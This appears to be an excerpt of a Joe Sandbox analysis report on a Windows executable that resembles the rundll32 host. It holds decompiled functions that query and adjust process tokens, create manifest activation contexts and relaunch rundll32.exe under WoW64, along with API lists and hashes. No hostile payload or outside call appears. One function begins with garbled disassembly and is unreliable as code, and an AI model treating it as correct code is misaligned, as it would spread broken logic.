                                                  				_t16 = E00041A33(__ecx,  &_v8); // executed; opens the own token with TOKEN_QUERY (0x8) and fills _v8 via NtQueryInformationToken (class not visible in this excerpt)
                                                  				_t28 = _t16;
                                                  				if(_t28 != 0 && _v8 == 0) {
                                                  					E000420B4(_a4,  &_v12); // QueryActCtxW(QUERY_ACTCTX_FLAG_USE_ACTIVE_ACTCTX, ..., RunlevelInformationInActivationContext = 5, 12-byte buffer): _v12 = run level from the DLL's manifest
                                                  					_t21 = _v12;
                                                  					if(_t21 == 0) { // ACTCTX_RUN_LEVEL_UNSPECIFIED: the DLL declares no run level
                                                  						_t22 =  &_a4;
                                                  						__imp__NtOpenProcessToken(0xffffffff, 0x80, _t22); // TOKEN_ADJUST_DEFAULT on the own process token
                                                  						if(_t22 >= 0) { // decompiler artefact: the test is on the NTSTATUS returned, not on _t22
                                                  							_v12 = 1;
                                                  							__imp__NtSetInformationToken(_a4, 0x18,  &_v12, 4); // TokenVirtualizationEnabled (0x18) = 1: UAC file/registry virtualization is switched on for this process
                                                  							NtClose(_a4);
                                                  						}
                                                  					} else {
                                                  						if(_t21 != 1) { // only ACTCTX_RUN_LEVEL_AS_INVOKER (1) is accepted; highestAvailable/requireAdministrator make the caller show the requestedRunLevel error
                                                  							_t28 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t28;
                                                  			}
                                                  
                                                  Call-site addresses for the C lines above (the original report shows them as a column beside the code, one per source line, in this order):
                                                  0x000419e8 0x000419e9 0x000419ea 0x000419ee 0x000419f7 0x000419fc 0x00041a00 0x00041a0f 0x00041a17 0x00041a1a 0x00042108 0x00042113 0x0004211b 0x0004212c 0x00042133 0x0004213c 0x0004213c 0x00041a20 0x00041a21 0x00042383 0x00042383 0x00041a21 0x00041a1a 0x00041a2b

                                                  APIs
                                                    • Part of subcall function 00041A33: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00041A4B
                                                    • Part of subcall function 00041A33: NtClose.NTDLL ref: 00041A6E
                                                    • Part of subcall function 000420B4: QueryActCtxW.KERNEL32(80000000,000000FF,00000000,00000005,?,0000000C,00000000), ref: 000420E4
                                                  • NtOpenProcessToken.NTDLL(000000FF,00000080,00000000), ref: 00042113
                                                  • NtSetInformationToken.NTDLL ref: 00042133
                                                  • NtClose.NTDLL ref: 0004213C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
• Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: Token$CloseOpenProcess$InformationQuery
                                                  • String ID:
                                                  • API String ID: 1146784981-0
                                                  • Opcode ID: f8c859e13efbdb1d1435039ac2c94e2b267d1032adcc57caa924eb3f10f3a407
                                                  • Instruction ID: 0b4c69ab4bc7c982a75ac024f30d4ad3f354e1945b83ba643448ca3da09ebfee
                                                  • Opcode Fuzzy Hash: f8c859e13efbdb1d1435039ac2c94e2b267d1032adcc57caa924eb3f10f3a407
                                                  • Instruction Fuzzy Hash: 1401BCF6600208BBEB109FD4CC09BEE7AB8EB51351F504174B610D62A0D7749BC4CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 221 41a8c-41ac0 NtQueryInformationToken 222 41ad5-41ad9 221->222 223 41ac2-41ac6 221->223 224 421e3-421e8 223->224 225 41acc-41acf 223->225 224->222 225->222 226 42362-42378 NtQueryInformationToken 225->226 227 421ed-421f1 226->227 228 4237e 226->228 227->224 229 421f3 227->229 228->222 229->222
                                                  APIs
                                                  • NtQueryInformationToken.NTDLL ref: 00041ABC
                                                  • NtQueryInformationToken.NTDLL ref: 00042374
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
• Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: InformationQueryToken
                                                  • String ID:
                                                  • API String ID: 4239771691-0
                                                  • Opcode ID: dc0adf43f05368ca026045bb25f77f3cab9587e45f4603985a44fdb258ac0f6f
                                                  • Instruction ID: 3856091163608c359e9f9114945b1648ca1b44f9021ac7ece2db20e8f97448d5
                                                  • Opcode Fuzzy Hash: dc0adf43f05368ca026045bb25f77f3cab9587e45f4603985a44fdb258ac0f6f
                                                  • Instruction Fuzzy Hash: 0F118CB2601218FBEB21CF85CC40FEEB7BCEB59760F514066FA10D6160D3709A51DBA6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 230 41a33-41a53 NtOpenProcessToken 231 41a55-41a64 call 41a8c 230->231 232 41a7f-41a84 230->232 234 41a69-41a77 NtClose 231->234 234->232 235 41a79-41a7e 234->235 235->232
                                                  C-Code - Quality: 58%
                                                  			E00041A33(void* __ecx, void* _a4) {
                                                  				char _v8;
                                                  				char _v12;
                                                  				void** _t9;
                                                  				void* _t13;
                                                  				void* _t20;
                                                  				char _t21;
                                                  				void* _t23;
                                                  				intOrPtr* _t24;
                                                  
                                                  				_t24 = _a4;
                                                  				_t9 =  &_a4;
                                                  				_t21 = 0;
                                                  				 *_t24 = 0;
                                                  				__imp__NtOpenProcessToken(0xffffffff, 8, _t9, _t20, _t23, __ecx, __ecx);
                                                  				if(_t9 >= 0) {
                                                  					_v8 = 0;
                                                  					_t13 = E00041A8C(__ecx, _a4,  &_v8,  &_v12); // executed
                                                  					NtClose(_a4);
                                                  					if(_t13 >= 0) {
                                                  						 *_t24 = _v8;
                                                  						_t21 = 1;
                                                  					}
                                                  				}
                                                  				return _t21;
			}

                                                  APIs
                                                  • NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00041A4B
                                                    • Part of subcall function 00041A8C: NtQueryInformationToken.NTDLL ref: 00041ABC
                                                  • NtClose.NTDLL ref: 00041A6E
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
• Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: Token$CloseInformationOpenProcessQuery
                                                  • String ID:
                                                  • API String ID: 65470678-0
                                                  • Opcode ID: 148d8cb120c3c26bb31ab2f81411e0767cefb2bb071fc00880a2be374f842c2d
                                                  • Instruction ID: e7cf984022285455b2cda096bcf95bd0edadacd26529563b533471daf50038dd
                                                  • Opcode Fuzzy Hash: 148d8cb120c3c26bb31ab2f81411e0767cefb2bb071fc00880a2be374f842c2d
                                                  • Instruction Fuzzy Hash: D1F06DBA600248BBDB009F95CC84DEF7BADEB95360B104126BA51D3250D670DB849B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 38%
                                                  			E00041E56(void* __ecx, WCHAR* _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                  				signed int _v8;
                                                  				short _v528;
                                                  				intOrPtr* _v532;
                                                  				intOrPtr _v544;
                                                  				WCHAR* _v556;
                                                  				signed int _v560;
                                                  				signed int _v564;
                                                  				WCHAR* _v568;
                                                  				struct HINSTANCE__* _v572;
                                                  				signed int _v580;
                                                  				char _v596;
                                                  				signed int _v600;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr* _t41;
                                                  				long _t42;
                                                  				WCHAR* _t46;
                                                  				void* _t49;
                                                  				signed int _t51;
                                                  				signed int _t54;
                                                  				signed int _t56;
                                                  				signed int _t58;
                                                  				WCHAR* _t60;
                                                  				void* _t63;
                                                  				long _t65;
                                                  				signed int _t70;
                                                  				signed int _t74;
                                                  				signed int _t76;
                                                  				WCHAR* _t77;
                                                  				void* _t78;
                                                  				long _t79;
                                                  				signed int _t80;
                                                  
                                                  				_v8 =  *0x45040 ^ _t80;
                                                  				_t41 = _a8;
                                                  				_t77 = _a4;
                                                  				_t70 = 0;
                                                  				_v532 = _t41;
                                                  				 *_t41 = 0; // executed
                                                  				_t42 = GetFileAttributesW(_t77); // executed
                                                  				_t79 = 0x104;
                                                  				if(_t42 == 0xffffffff) {
                                                  					if(SearchPathW(0, _t77, 0, 0x104,  &_v528,  &_v568) != 0) {
                                                  						L2:
                                                  						_v560 = _v560 & 0x00000000;
                                                  						_t46 =  &_v528;
                                                  						_t70 = _t70 | 0xffffffff;
                                                  						_v564 = 0x20;
                                                  						_v556 = _t46;
                                                  						_t77 = lstrlenW(_t46);
                                                  						_t49 = E00042001( &_v528, _t79, L".manifest");
                                                  						_t79 = __imp__CreateActCtxW;
                                                  						if(_t49 >= 0) {
                                                  							_t65 = GetFileAttributesW( &_v528); // executed
                                                  							if(_t65 != _t70) {
                                                  								_t70 =  *_t79( &_v564);
                                                  							}
                                                  						}
                                                  						 *((short*)(_t80 + _t77 * 2 - 0x20c)) = 0;
                                                  						if(_t70 != 0xffffffff) {
                                                  							L14:
                                                  							_push(_v532);
                                                  							_push(_t70);
                                                  							goto L11;
                                                  						} else {
                                                  							_v560 = 8;
                                                  							_v544 = 0x7b;
                                                  							_t54 =  *_t79( &_v564); // executed
                                                  							_t70 = _t54;
                                                  							if(_t70 != 0xffffffff) {
                                                  								goto L14;
                                                  							}
                                                  							_v544 = 0x7c;
                                                  							_t56 =  *_t79( &_v564); // executed
                                                  							_t70 = _t56;
                                                  							if(_t70 != 0xffffffff) {
                                                  								L12:
                                                  								_t51 = _t70;
                                                  								L13:
                                                  								return E00041189(_t51, _t70, _v8 ^ _t80, _t76, _t77, _t79);
                                                  							}
                                                  							_v544 = 2;
                                                  							_t58 =  *_t79( &_v564); // executed
                                                  							_t70 = _t58;
                                                  							if(_t70 != 0xffffffff) {
                                                  								goto L14;
                                                  							}
                                                  							if(_a12 == 0) {
                                                  								goto L12;
                                                  							}
                                                  							_v600 = _v600 & 0x00000000;
                                                  							_t76 = 7;
                                                  							_t74 = _t76;
                                                  							_t78 =  &_v596;
                                                  							_t60 = memset(_t78, 0, _t74 << 2);
                                                  							_t77 = _t78 + _t74;
                                                  							_v596 = 0x88;
                                                  							_v580 = _t76;
                                                  							_v572 = GetModuleHandleW(_t60);
                                                  							_v600 = 0x20;
                                                  							_t63 =  *_t79( &_v600);
                                                  							if(_t63 == _t70) {
                                                  								goto L12;
                                                  							}
                                                  							_push(_v532);
                                                  							_push(_t63);
                                                  							L11:
                                                  							__imp__ActivateActCtx();
                                                  							goto L12;
                                                  						}
                                                  					}
                                                  					L16:
                                                  					_t51 = 0;
                                                  					goto L13;
                                                  				}
                                                  				if(E00041AE1( &_v528, 0x104, _t77) < 0) {
                                                  					goto L16;
                                                  				}
                                                  				goto L2;
			}

                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00000000,00000001,00000001), ref: 00041E7F
                                                  • lstrlenW.KERNEL32(?), ref: 00041ECA
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000104,.manifest), ref: 00041EF5
                                                  • CreateActCtxW.KERNEL32(00000020), ref: 00041F31
                                                  • CreateActCtxW.KERNEL32(00000020), ref: 00041F4F
                                                  • CreateActCtxW.KERNEL32(00000020), ref: 00041F69
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00041FA3
                                                  • CreateActCtxW.KERNEL32(00000000), ref: 00041FC0
                                                  • ActivateActCtx.KERNEL32(00000000,?), ref: 00041FCD
                                                  • SearchPathW.KERNEL32 ref: 0004234D
                                                  • CreateActCtxW.KERNEL32(00000020), ref: 0004261F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
• Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: Create$AttributesFile$ActivateHandleModulePathSearchlstrlen
                                                  • String ID: $ $.manifest$P4Uu0TUu$|
                                                  • API String ID: 833452776-189316523
                                                  • Opcode ID: 0f812060c7d1669e66bd82a5e94ca940156c2d15139c6a26618b0cf282b50f12
                                                  • Instruction ID: 03b94a76ed1ebb5eb9c03c7494443654536ee43109aada0e812846b952b542b9
                                                  • Opcode Fuzzy Hash: 0f812060c7d1669e66bd82a5e94ca940156c2d15139c6a26618b0cf282b50f12
                                                  • Instruction Fuzzy Hash: 62416FB59002189BDB20DFA4DD8CBDEB7F8AB49324F1006B5E119D2191D7789AC8CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 44%
                                                  			E000439D0(intOrPtr __eax, signed int __ebx, char __edx, void* __eflags) {
                                                  				intOrPtr _v0;
                                                  				signed int _v4;
                                                  				signed int _v12;
                                                  				short _v528;
                                                  				struct _SECURITY_ATTRIBUTES* _v532;
                                                  				struct _PROCESS_INFORMATION _v548;
                                                  				struct _STARTUPINFOW _v616;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr _t26;
                                                  				void* _t27;
                                                  				void* _t29;
                                                  				void* _t30;
                                                  				void* _t35;
                                                  				void* _t36;
                                                  				int _t48;
                                                  				long _t50;
                                                  				void* _t57;
                                                  				signed int _t60;
                                                  				void* _t64;
                                                  				void* _t69;
                                                  				void* _t70;
                                                  				intOrPtr* _t71;
                                                  				signed int _t73;
                                                  				signed int _t75;
                                                  
                                                  				_t62 = __edx;
                                                  				_t56 = __ebx;
                                                  				_t26 = __eax;
                                                  				asm("loopne 0xffffffbf");
                                                  				asm("in al, 0xfc");
                                                  				_push(0x8e4b804b);
                                                  				asm("pushfd");
                                                  				if(__eflags != 0) {
                                                  					 *(__edx + 0x73) =  *(__edx + 0x73) ^ __ebx;
                                                  					 *((char*)(__eax - 0x6f6f6f70)) = __edx;
                                                  					_push(_t73);
                                                  					_t73 = _t75;
                                                  					_t75 = _t75 - 0x268;
                                                  					_v12 =  *0x45040 ^ _t73;
                                                  					_t26 = _v0;
                                                  					_push(__ebx);
                                                  					_t56 = 0;
                                                  				}
                                                  				_v532 = _t56;
                                                  				_t27 = E000429B3(_t26); // executed
                                                  				_t69 = _t27;
                                                  				_t29 = GetCurrentProcess();
                                                  				__imp__IsWow64Process(_t29,  &_v532);
                                                  				if(_t29 == 0 || _v532 == _t56) {
                                                  					L14:
                                                  					_t30 = 0;
                                                  					__eflags = 0;
                                                  				} else {
                                                  					_t60 = 8;
                                                  					_v616.dwXCountChars = _t56;
                                                  					memset( &(_v616.dwYCountChars), 0, _t60 << 2);
                                                  					__imp__GetNativeSystemInfo( &(_v616.dwXCountChars)); // executed
                                                  					_t35 = 9;
                                                  					if(_t35 != _v616.dwXCountChars || _t69 == 0x8664) {
                                                  						_t36 = 6;
                                                  						if(_t36 != _v616.dwXCountChars || _t69 == 0x200) {
                                                  							if(GetSystemDirectoryW( &_v528, 0xf6) == 0 || E0004384E( &_v528, 0x105, L"rundll32.exe", _t56) < 0) {
                                                  								goto L14;
                                                  							} else {
                                                  								_t71 = __imp__Wow64EnableWow64FsRedirection;
                                                  								 *_t71(_t56);
                                                  								memset( &(_v616.lpReserved), _t56, 0x40);
                                                  								_v616.cb = 0x44;
                                                  								_t48 = CreateProcessW( &_v528, GetCommandLineW(), _t56, _t56, _t56, _t56, _t56, _t56,  &_v616,  &_v548); // executed
                                                  								if(_t48 == 0) {
                                                  									goto L14;
                                                  								} else {
                                                  									 *_t71(1);
                                                  									_t50 = WaitForSingleObject(_v548.hProcess, 0xffffffff);
                                                  									CloseHandle(_v548);
                                                  									CloseHandle(_v548.hThread);
                                                  									if(_t50 != _t56) {
                                                  										goto L14;
                                                  									} else {
                                                  										_t30 = 1;
                                                  									}
                                                  								}
                                                  							}
                                                  						} else {
                                                  							goto L14;
                                                  						}
                                                  					} else {
                                                  						goto L14;
                                                  					}
                                                  				}
                                                  				_pop(_t64);
                                                  				_pop(_t70);
                                                  				_pop(_t57);
                                                  				return E00041189(_t30, _t57, _v4 ^ _t73, _t62, _t64, _t70);
                                                  			}

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,00042411,000000C1,?,00000000), ref: 00043A17
                                                  • IsWow64Process.KERNEL32(00000000), ref: 00043A1E
                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 00043A52
                                                  • GetSystemDirectoryW.KERNEL32(?,000000F6), ref: 00043A94
                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00043AC8
                                                  • memset.MSVCRT ref: 00043AD4
                                                  • GetCommandLineW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00043AFA
                                                  • CreateProcessW.KERNEL32(?,00000000), ref: 00043B08
                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00043B14
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00043B1E
                                                  • CloseHandle.KERNEL32(?), ref: 00043B32
                                                  • CloseHandle.KERNEL32(?), ref: 00043B3A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
• Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: Wow64$Process$CloseEnableHandleRedirectionSystem$CommandCreateCurrentDirectoryInfoLineNativeObjectSingleWaitmemset
                                                  • String ID: D$rundll32.exe
                                                  • API String ID: 233067003-895393680
                                                  • Opcode ID: 8b1f1d922cdf868e23b8c3725cc48eec18cb7479fe37179663aa5f26c47a7ad6
                                                  • Instruction ID: f77027fd4d7eef2bb13d4c4469d761abcde6f77478641bea6d5b6fb7b7be704a
                                                  • Opcode Fuzzy Hash: 8b1f1d922cdf868e23b8c3725cc48eec18cb7479fe37179663aa5f26c47a7ad6
                                                  • Instruction Fuzzy Hash: BA41A6F6940219ABDB60ABA0DD4DBDEB7B8EB14710F0044B6E609E7151DB748EC4CF68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 65%
                                                  			E000439E5(void* __edx, intOrPtr _a4) {
                                                  				signed int _v8;
                                                  				short _v532;
                                                  				char _v536;
                                                  				struct _PROCESS_INFORMATION _v552;
                                                  				struct _STARTUPINFOW _v620;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr _t25;
                                                  				intOrPtr* _t26;
                                                  				void* _t28;
                                                  				void* _t29;
                                                  				void* _t34;
                                                  				void* _t35;
                                                  				int _t47;
                                                  				long _t49;
                                                  				signed int _t56;
                                                  				void* _t58;
                                                  				void* _t60;
                                                  				intOrPtr* _t61;
                                                  				signed int _t62;
                                                  
                                                  				_t58 = __edx;
                                                  				_v8 =  *0x45040 ^ _t62;
                                                  				_t25 = _a4;
                                                  				_v536 = 0;
                                                  				_t26 = E000429B3(_t25); // executed
                                                  				_t61 = _t26;
                                                  				_t28 = GetCurrentProcess();
                                                  				__imp__IsWow64Process(_t28,  &_v536);
                                                  				if(_t28 == 0 || _v536 == 0) {
                                                  					L12:
                                                  					_t29 = 0;
                                                  				} else {
                                                  					_t56 = 8;
                                                  					_v620.dwXCountChars = 0;
                                                  					_t60 =  &(_v620.dwYCountChars);
                                                  					memset(_t60, 0, _t56 << 2);
                                                  					_t59 = _t60 + _t56;
                                                  					__imp__GetNativeSystemInfo( &(_v620.dwXCountChars)); // executed
                                                  					_t34 = 9;
                                                  					if(_t34 != _v620.dwXCountChars || _t61 == 0x8664) {
                                                  						_t35 = 6;
                                                  						if(_t35 != _v620.dwXCountChars || _t61 == 0x200) {
                                                  							if(GetSystemDirectoryW( &_v532, 0xf6) == 0 || E0004384E( &_v532, 0x105, L"rundll32.exe", 0) < 0) {
                                                  								goto L12;
                                                  							} else {
                                                  								_t61 = __imp__Wow64EnableWow64FsRedirection;
                                                  								 *_t61(0);
                                                  								memset( &(_v620.lpReserved), 0, 0x40);
                                                  								_v620.cb = 0x44;
                                                  								_t47 = CreateProcessW( &_v532, GetCommandLineW(), 0, 0, 0, 0, 0, 0,  &_v620,  &_v552); // executed
                                                  								if(_t47 == 0) {
                                                  									goto L12;
                                                  								} else {
                                                  									 *_t61(1);
                                                  									_t49 = WaitForSingleObject(_v552.hProcess, 0xffffffff);
                                                  									_t61 = CloseHandle;
                                                  									_t59 = _t49;
                                                  									CloseHandle(_v552);
                                                  									CloseHandle(_v552.hThread);
                                                  									if(_t49 != 0) {
                                                  										goto L12;
                                                  									} else {
                                                  										_t29 = 1;
                                                  									}
                                                  								}
                                                  							}
                                                  						} else {
                                                  							goto L12;
                                                  						}
                                                  					} else {
                                                  						goto L12;
                                                  					}
                                                  				}
                                                  				return E00041189(_t29, 0, _v8 ^ _t62, _t58, _t59, _t61);
                                                  			}

                                                  APIs
                                                    • Part of subcall function 000429B3: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 000429E3
                                                    • Part of subcall function 000429B3: ReadFile.KERNELBASE(00000000,?,00000040,?,00000000), ref: 00042A03
                                                    • Part of subcall function 000429B3: SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 00042A1A
                                                    • Part of subcall function 000429B3: ReadFile.KERNELBASE(00000000,?,000000F8,?,00000000), ref: 00042A37
                                                    • Part of subcall function 000429B3: CloseHandle.KERNELBASE(00000000), ref: 00042A48
                                                  • GetCurrentProcess.KERNEL32(?,00042411,000000C1,?,00000000), ref: 00043A17
                                                  • IsWow64Process.KERNEL32(00000000), ref: 00043A1E
                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 00043A52
                                                  • GetSystemDirectoryW.KERNEL32(?,000000F6), ref: 00043A94
                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00043AC8
                                                  • memset.MSVCRT ref: 00043AD4
                                                  • GetCommandLineW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00043AFA
                                                  • CreateProcessW.KERNEL32(?,00000000), ref: 00043B08
                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00043B14
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00043B1E
                                                  • CloseHandle.KERNEL32(?), ref: 00043B32
                                                  • CloseHandle.KERNEL32(?), ref: 00043B3A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
• Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: Wow64$File$CloseHandleProcess$CreateEnableReadRedirectionSystem$CommandCurrentDirectoryInfoLineNativeObjectPointerSingleWaitmemset
                                                  • String ID: D$rundll32.exe
                                                  • API String ID: 446403646-895393680
                                                  • Opcode ID: 36541c026293007293856094d3e17a33549d2b7dc1d55c182e0dc21ab0f5a71c
                                                  • Instruction ID: ac9297e9a185aaca3b54fe5dcd82fd5d00cad80cb0155a2fc810b1f287447ebe
                                                  • Opcode Fuzzy Hash: 36541c026293007293856094d3e17a33549d2b7dc1d55c182e0dc21ab0f5a71c
                                                  • Instruction Fuzzy Hash: FE3189F294021D6EDB60ABA0DD8CBDEB7BCEB14750F0005B6A609E2051DB749EC4CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 82%
                                                  			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                  				long _t28;
                                                  				signed int _t31;
                                                  				int* _t32;
                                                  				int _t33;
                                                  				int _t35;
                                                  				intOrPtr* _t36;
                                                  				void* _t42;
                                                  				signed int _t47;
                                                  				signed int _t48;
                                                  				signed int _t49;
                                                  				intOrPtr _t51;
                                                  				long _t63;
                                                  				intOrPtr _t65;
                                                  				void* _t67;
                                                  
                                                  				E00041593();
                                                  				_push(0x5c);
                                                  				_push(0x418a0);
                                                  				E00041E0C(__ebx, __edi, __esi);
                                                  				 *(_t67 - 0x1c) = 0;
                                                  				 *((intOrPtr*)(_t67 - 4)) = 0;
                                                  				GetStartupInfoW(_t67 - 0x6c);
                                                  				 *((intOrPtr*)(_t67 - 4)) = 0xfffffffe;
                                                  				 *((intOrPtr*)(_t67 - 4)) = 1;
                                                  				_t63 =  *( *[fs:0x18] + 4);
                                                  				 *((intOrPtr*)(_t67 - 0x20)) = 0;
                                                  				while(1) {
                                                  					_t28 = InterlockedCompareExchange(0x45068, _t63, 0);
                                                  					if(_t28 == 0) {
                                                  						break;
                                                  					}
                                                  					__eflags = _t28 - _t63;
                                                  					if(__eflags != 0) {
                                                  						Sleep(0x3e8);
                                                  						continue;
                                                  					} else {
                                                  						_t65 = 1;
                                                  						 *((intOrPtr*)(_t67 - 0x20)) = 1;
                                                  					}
                                                  					L3:
                                                  					if( *0x45064 == _t65) {
                                                  						_push(0x1f);
                                                  						L00043E59();
                                                  						goto L6;
                                                  					} else {
                                                  						if( *0x45064 != 0) {
                                                  							 *0x453b4 = _t65;
                                                  							goto L6;
                                                  						} else {
                                                  							 *0x45064 = _t65;
                                                  							_t42 = E00041763(0x41890, 0x4189c); // executed
                                                  							if(_t42 != 0) {
                                                  								L33:
                                                  								 *((intOrPtr*)(_t67 - 4)) = 0xfffffffe;
                                                  								_t33 = 0xff;
                                                  								goto L34;
                                                  							} else {
                                                  								L6:
                                                  								if( *0x45064 == _t65) {
                                                  									_push(0x4188c);
                                                  									_push(0x41884); // executed
                                                  									L00041580(); // executed
                                                  									 *0x45064 = 2;
                                                  								}
                                                  								if( *((intOrPtr*)(_t67 - 0x20)) == 0) {
                                                  									InterlockedExchange(0x45068, 0);
                                                  								}
                                                  								if( *0x453b0 != 0) {
                                                  									_push(0x453b0);
                                                  									_t31 = E00043DC5(0, 0x45068, _t65, __eflags);
                                                  									__eflags = _t31;
                                                  									if(_t31 != 0) {
                                                  										 *0x453b0(0, 2, 0);
                                                  									}
                                                  								}
                                                  								_t32 = __imp___wcmdln;
                                                  								if( *_t32 == 0) {
                                                  									goto L33;
                                                  								} else {
                                                  									_t35 =  *_t32;
                                                  									while(1) {
                                                  										 *(_t67 - 0x24) = _t35;
                                                  										_t47 =  *_t35 & 0x0000ffff;
                                                  										if(_t47 <= 0x20) {
                                                  											goto L16;
                                                  										}
                                                  										L14:
                                                  										if(_t47 == 0x22) {
                                                  											__eflags =  *(_t67 - 0x1c);
                                                  											 *(_t67 - 0x1c) = 0 |  *(_t67 - 0x1c) == 0x00000000;
                                                  										}
                                                  										_t35 = _t35 + 2;
                                                  										continue;
                                                  										L16:
                                                  										__eflags = _t47;
                                                  										if(_t47 != 0) {
                                                  											__eflags =  *(_t67 - 0x1c);
                                                  											if( *(_t67 - 0x1c) != 0) {
                                                  												goto L14;
                                                  											} else {
                                                  												goto L18;
                                                  											}
                                                  											while(1) {
                                                  												L18:
                                                  												_t48 =  *_t35 & 0x0000ffff;
                                                  												__eflags = _t48;
                                                  												if(_t48 == 0) {
                                                  													break;
                                                  												}
                                                  												__eflags = _t48 - 0x20;
                                                  												if(_t48 <= 0x20) {
                                                  													_t35 = _t35 + 2;
                                                  													 *(_t67 - 0x24) = _t35;
                                                  													continue;
                                                  												}
                                                  												break;
                                                  											}
                                                  											__eflags =  *(_t67 - 0x40) & 0x00000001;
                                                  											if(( *(_t67 - 0x40) & 0x00000001) != 0) {
                                                  												_t49 =  *(_t67 - 0x3c) & 0x0000ffff;
                                                  											} else {
                                                  												_t49 = 0xa;
                                                  											}
                                                  											E00041203(0x40000, 0, _t35, _t49); // executed
                                                  											 *0x45078 = _t35;
                                                  											__eflags =  *0x45050;
                                                  											if( *0x45050 != 0) {
                                                  												_t33 =  *0x45078;
                                                  												L34:
                                                  												return E000419CA(_t33);
                                                  											} else {
                                                  												exit(_t35);
                                                  												_t36 =  *((intOrPtr*)(_t67 - 0x14));
                                                  												_t51 =  *((intOrPtr*)( *_t36));
                                                  												 *((intOrPtr*)(_t67 - 0x28)) = _t51;
                                                  												_push(_t36);
                                                  												_push(_t51);
                                                  												L00043D37();
                                                  												return _t36;
                                                  											}
                                                  											goto L38;
                                                  										}
                                                  										goto L18;
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  					L38:
                                                  				}
                                                  				_t65 = 1;
                                                  				goto L3;
                                                  			}

                                                  APIs
